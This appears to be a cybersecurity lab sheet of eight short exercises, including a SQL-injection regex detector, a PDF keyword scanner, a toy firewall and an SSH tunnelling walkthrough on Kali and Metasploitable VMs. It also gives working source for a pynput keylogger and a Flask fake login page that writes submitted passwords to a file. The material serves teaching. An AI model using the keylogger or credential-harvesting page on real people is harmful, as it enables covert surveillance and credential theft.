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1.SQL injection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re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def check_sql_injection(input_string):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sql_injection_patterns = [r"(['\";=(){}|&amp;^])", r"(--|\s+OR\s+|UNION\s+ALL\s+SELECT)", r"(\bSELECT\b|\bDROP\b|\bUPDATE\b)"]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# Check for any SQL Injection patterns using regular expressions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for pattern in sql_injection_patterns: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if re.search(pattern, input_string, re.IGNORECASE):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  return f"Potential SQL Injection detected. Please sanitize inputs."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return "No SQL Injection detected."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input_string = input("Enter a string to check for SQL injection: ")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result = check_sql_injection(input_string)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print(result)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2.PDF malware analysis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from pypdf import PdfReader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def check_pdf_for_malware(pdf_path):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# Suspicious keywords associated with malware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suspicious_keywords = ['/js', '/JavaScript', '/AA', '/open_action']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reader = PdfReader(pdf_path)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pdf_safe = True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for page_num, page in enumerate(reader.pages):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text = page.extract_text()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if text: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    for keyword in suspicious_keywords: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        if keyword in text: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            print(f"Malicious PDF detected: Keyword '{keyword}' found on page {page_num + 1}")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            pdf_safe = False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            break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    print(f"Page {page_num + 1} has no extractable text.")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if pdf_safe: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print("The PDF is safe.")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print("The PDF contains suspicious content.")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print(f"Error processing PDF: {e}")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pdf_path = 'sample.pdf'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check_pdf_for_malware(pdf_path)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3.Simple Firewall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def simple_firewall(packet):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trusted_ips = ["192.168.1.100"]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trusted_ports = [80, 443]  # HTTP and HTTPS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if packet["src_ip"] in trusted_ips and packet["dst_port"] in trusted_ports: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return True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return False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packets = [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{"src_ip": "192.168.1.100", "dst_ip": "192.168.1.200", "dst_port": 80},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{"src_ip": "192.168.1.101", "dst_ip": "192.168.1.200", "dst_port": 80},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{"src_ip": "192.168.1.100", "dst_ip": "192.168.1.200", "dst_port": 22},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for packet in packets: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if simple_firewall(packet):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print(f"Packet allowed: {packet}")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print(f"Packet blocked: {packet}")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4.Symmetric XOR encryption/decryption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def xor_encrypt_decrypt(input_string, key):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input_bytes = bytearray(input_string, 'utf-8')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output_bytes = bytearray([byte ^ key for byte in input_bytes])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return output_bytes.decode('utf-8', 'ignore')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key = 123  # XOR key (choose a proper key)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original_text = input("Enter the message to encrypt: ")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encrypted_text = xor_encrypt_decrypt(original_text, key)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print(f"Encrypted: {encrypted_text}")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decrypted_text = xor_encrypt_decrypt(encrypted_text, key)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print(f"Decrypted: {decrypted_text}")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5.Key logger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/*import pynput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pynput.keyboard import Key,Listener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log_file="keylog.txt"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 on_press(key):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with open(log_file,"a")as f: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f.write(key.char)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except AttributeError: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if key==Key.space:f.write(" ")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elif key==Key.enter:f.write("\n")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elif key==Key.tab:f.write("\t")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else:f.write(f"{key}")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 on_release(key):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if key==Key.esc:return False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listener=Listener(on_press=on_press,on_release=on_release)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listener.start()/*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6.Process listing new Linux user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# Step 1: Create a new user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sudo adduser username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# Step 2: Login as the new user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su - username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# Step 3: Create a script to display all processes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nano process_list.sh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# Step 4: Write the following commands in the script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ps aux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# Step 5: Give execute permissions to the script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chmod +x process_list.sh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ls -l process_list.sh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# Step 6: Execute the script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./process_list.sh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7.Phishing Simulation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from flask import Flask, render_template_string, request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app = Flask(__name__)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LOGIN_PAGE = """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&lt;title&gt;Login Page&lt;/title&gt;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&lt;h2&gt;Login&lt;/h2&gt;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&lt;form method="POST" action="/login"&gt;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&lt;label for="username"&gt;Username:&lt;/label&gt;&lt;br&gt;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&lt;input type="text" id="username" name="username" required&gt;&lt;br&gt;&lt;br&gt;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&lt;label for="password"&gt;Password:&lt;/label&gt;&lt;br&gt;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&lt;input type="password" id="password" name="password" required&gt;&lt;br&gt;&lt;br&gt;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&lt;button type="submit"&gt;Login&lt;/button&gt;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&lt;/form&gt;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CREDENTIALS_FILE = "credentials.txt"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@app.route('/')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def home():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return render_template_string(LOGIN_PAGE)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@app.route('/login', methods=['POST'])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def login():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username = request.form.get('username')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password = request.form.get('password')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with open(CREDENTIALS_FILE, 'a') as f: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f.write(f"Username: {username}, Password: {password}\n")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return "&lt;h2&gt;Login successful!&lt;/h2&gt;"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if __name__ == '__main__':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if os.path.exists(CREDENTIALS_FILE):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os.remove(CREDENTIALS_FILE)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print("Starting the dummy login server. Open http://127.0.0.1:5000 in your browser.")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app.run(debug=True)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8.SSH Tunneling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Experiment 8 - SSH Tunnelling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 up 2 VMs and demonstrate SSH Tunnelling between them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Prerequisites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Kali Linux Virtual Machine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Metasploitable Virtual Machine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1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Launch both VMs and run the ifconfig command to get IPs of both devices.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2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Ping VM1 and VM2 from each other using ping &lt;IP&gt; command from both VMs to confirm connectivity between both VMs.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3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 SSH and Python on both terminals using the following commands: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sudo apt update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sudo apt install openssh-client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sudo apt install python3 or sudo apt-get install python3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4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python server on Metasploitable VM (victim)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python3 -m http.server 8080 or python -m SimpleHTTPServer 8080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5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SSH to connect to victim VM from Kali VM (attacker)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ssh -L 9090:localhost:8080 msfadmin@&lt;Metasploitable_IP&gt;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this does not work use the following command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ssh -o HostkeyAlgorithms=+ssh-rsa -L 9090:localhost:8080 msfadmin@&lt;Metasploitable_IP&gt;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Step 6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Kali VM, Open the browser and search http://localhost:9090. You can see the content of Metasploitable VM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